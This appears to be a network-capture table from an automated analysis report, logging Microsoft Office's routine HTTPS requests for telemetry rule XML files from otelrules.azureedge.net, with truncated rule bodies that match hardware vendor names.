Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:22 UTC | 192 | OUT | GET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:23 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:23 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA701121"
x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142523Z-16547b76f7fwvr5dhC1DFW2c940000000kng00000000der9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:23 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        18192.168.2.54972713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:22 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-16547b76f7fwvr5dhC1DFW2c940000000kqg000000008e69
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:23 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.5 | 49729 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:23 UTC | 192 | OUT | GET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:23 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 0b41d791-c01e-0079-140b-36e51a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-1749fc9bdbdht5mthC1DFWph9000000002n000000000g8td
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:23 UTC | 464 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.2.5 | 49728 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:23 UTC | 192 | OUT | GET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:23 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: c860b0c2-d01e-007a-2fa3-34f38c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-r178fb8d765zlhnthC1DFWvdu0000000015g00000000bxsz
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:23 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
21 | 192.168.2.5 | 49730 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:23 UTC | 192 | OUT | GET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:23 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:23 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142523Z-16547b76f7fcrtpchC1DFW52e80000000kug00000000999q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:23 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.5 | 49731 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:23 UTC | 192 | OUT | GET /rules/rule120625v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
ETag: "0x8DC582B9748630E"
x-ms-request-id: e9ec46b7-301e-0099-3c15-366683000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-1749fc9bdbdpg69chC1DFWhecg00000002kg000000004tu6
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
23 | 192.168.2.5 | 49732 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:23 UTC | 192 | OUT | GET /rules/rule120626v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DACDF62"
x-ms-request-id: 849cffad-401e-008c-4c40-3686c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-16547b76f7fp6mhthC1DFWrggn0000000kyg0000000035yu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.5 | 49733 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
ETag: "0x8DC582B9E8EE0F3"
x-ms-request-id: 41a7f78c-b01e-0097-2b78-354f33000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-r178fb8d7656shmjhC1DFWu5kw00000002mg00000000euhr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.5 | 49735 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120629v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 428
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC4F34CA"
x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-16547b76f7fr4g8xhC1DFW9cqc0000000k00000000006xmq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 428 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
26 | 192.168.2.5 | 49734 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120628v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C8E04C8"
x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-16547b76f7fj5p7mhC1DFWf8w40000000kv000000000d5hz
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
27 | 192.168.2.5 | 49737 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:24 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 499
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
ETag: "0x8DC582B98CEC9F6"
x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142524Z-16547b76f7f76p6chC1DFWctqw0000000kx0000000008htd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:24 UTC | 499 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.5 | 49736 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:24 GMT
Content-Type: text/xml
Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142524Z-16547b76f7f4k79zhC1DFWu9y00000000krg00000000k0d8
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:25 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.5 | 49738 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5815C4C"
x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142525Z-16547b76f7fknvdnhC1DFWxnys0000000ksg00000000ezrx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:25 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.5 | 49739 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:24 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB32BB5CB"
x-ms-request-id: 2e90e071-a01e-0098-64a3-348556000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142525Z-1749fc9bdbdgs9sshC1DFWt6ws00000002ug000000003rd0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:25 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.5 | 49740 | 13.107.246.45 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:25 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 494
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7f67wxlhC1DFWah9w0000000kn000000000nghe
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:25 UTC  494                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
32          192.168.2.5  49741        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:25 UTC  192                OUT        GET /rules/rule120635v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC  470                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 420
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DAE3EC0"
x-ms-request-id: 7cdefebb-b01e-0070-2ca7-341cc0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142525Z-r178fb8d765w8fzdhC1DFW8ep400000002ng0000000073xv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:25 UTC  420                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


Session ID  Source IP    Source Port  Destination IP  Destination Port
33          192.168.2.5  49742        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:25 UTC  192                OUT        GET /rules/rule120636v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC  470                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D43097E"
x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142525Z-16547b76f7ftdm8dhC1DFWs13g0000000km000000000pvgr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:25 UTC  472                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
34          192.168.2.5  49743        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:25 UTC  192                OUT        GET /rules/rule120637v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC  470                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:25 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
ETag: "0x8DC582BA909FA21"
x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142525Z-16547b76f7fdtmzhhC1DFW6zhc00000007ng00000000c7sv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:25 UTC    427                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID    Source IP      Source Port    Destination IP    Destination Port
35            192.168.2.5    49744          13.107.246.45     443

Timestamp                  Bytes transferred    Direction    Data
2024-11-14 14:25:25 UTC    192                  OUT          GET /rules/rule120638v0s19.xml HTTP/1.1
                                                             Connection: Keep-Alive
                                                             Accept-Encoding: gzip
                                                             User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                             Host: otelrules.azureedge.net
2024-11-14 14:25:25 UTC    470                  IN           HTTP/1.1 200 OK
                                                             Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                             Content-Type: text/xml
                                                             Content-Length: 486
                                                             Connection: close
                                                             Cache-Control: public, max-age=604800, immutable
                                                             Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                             ETag: "0x8DC582B92FCB436"
                                                             x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000
                                                             x-ms-version: 2018-03-28
                                                             x-azure-ref: 20241114T142525Z-16547b76f7fdtmzhhC1DFW6zhc00000007ng00000000c7sw
                                                             x-fd-int-roxy-purgeid: 0
                                                             X-Cache: TCP_HIT
                                                             Accept-Ranges: bytes
